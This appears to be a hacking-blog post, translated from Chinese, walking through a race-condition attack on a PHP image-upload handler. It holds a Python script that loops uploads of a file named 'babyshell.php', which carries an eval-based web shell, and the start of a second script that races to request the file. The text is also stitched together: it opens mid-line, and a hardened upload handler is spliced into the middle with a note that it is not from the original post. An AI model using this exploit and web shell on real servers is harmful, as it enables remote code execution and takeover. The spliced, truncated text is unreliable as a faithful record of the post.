
Hands-on | A Race-Condition File Upload

HACK学习呀  · WeChat official account  · Hacking  · 2023-04-05 12:55



, time()).rand(100, 999). 'test' . $extend ;
$upload = move_uploaded_file($data['file']['tmp_name'], $imgpath);
$imgpath = "../common/" . $imgpath;

if (!$upload) {
    echo ' ';
    exit;
} else {
    // .......
    // code that processes the file
    // .......
}
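
For contrast with the handler above, which moves the upload to its final path before the file-handling code runs, here is a hardened handler as an added example (not code from the original post or from the application). It assumes image uploads only; `store_upload()`, `ALLOWED_TYPES` and the storage path are hypothetical names.

```php
<?php
// Added example: every check runs on PHP's temporary file, and the file is
// moved only after it passes, so no unchecked file ever sits in a reachable path.

const ALLOWED_TYPES = [   // detected MIME type => extension chosen by the server
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

function store_upload(array $file, string $storeDir, int $maxBytes = 2097152): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $tmp = $file['tmp_name'];
    if (!is_uploaded_file($tmp) || filesize($tmp) > $maxBytes) {
        throw new RuntimeException('rejected: not an upload or too large');
    }

    // Decide the type from the content, never from the client-supplied
    // filename or Content-Type header.
    $mime = (string) (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    $ext  = ALLOWED_TYPES[$mime] ?? null;
    if ($ext === null || getimagesize($tmp) === false) {
        throw new RuntimeException('rejected: not an allowed image');
    }

    // Unguessable name instead of one built from time() and rand(100, 999).
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($storeDir, '/') . '/' . $name;
    if (!move_uploaded_file($tmp, $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640);   // readable, never executable
    return $name;
}

// Usage in the request handler (assumption: $data holds the $_FILES array and
// /var/app/uploads is outside the web root or has script execution disabled):
// $name = store_upload($data['file'], '/var/app/uploads');
```
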

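The idea here is to have one program send the upload request over and over while another requests the uploaded file, using the race condition as the bypass. I exported the image-upload request to Python requests code with a Burp plugin; it was thrown together quickly, so I did not add multithreading.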

import requests
try:
    url = "http://xxxxxxx/upload.php"
    cookies = {"PHPSESSID": "1gmkmeqdg9sl8i4crprkm25884"}
    headers = {"Cache-Control": "max-age=0", "Sec-Ch-Ua": "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"", "Sec-Ch-Ua-Mobile": "?0", "Sec-Ch-Ua-Platform": "\"macOS\"", "Upgrade-Insecure-Requests": "1", "Origin": "", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarym1ogNWdW0fVSBGcm", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "iframe", "Referer": "", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9"}
    data = "------WebKitFormBoundarym1ogNWdW0fVSBGcm\r\nContent-Disposition: form-data; name=\"file\"; filename=\"babyshell.php\"\r\nContent-Type: image/jpeg\r\n\r\n\n@eval($_GET['id']);\r\nfile_put_contents('test.php', '');\r\n\n?>\r\n------WebKitFormBoundarym1ogNWdW0fVSBGcm--\r\n"
    while 1:
        requests.post(url, headers=headers, cookies=cookies, data=data)
except:
    pass

Then write a second program to request the file:

import requests, time, random
while 1:
    time1 = (time





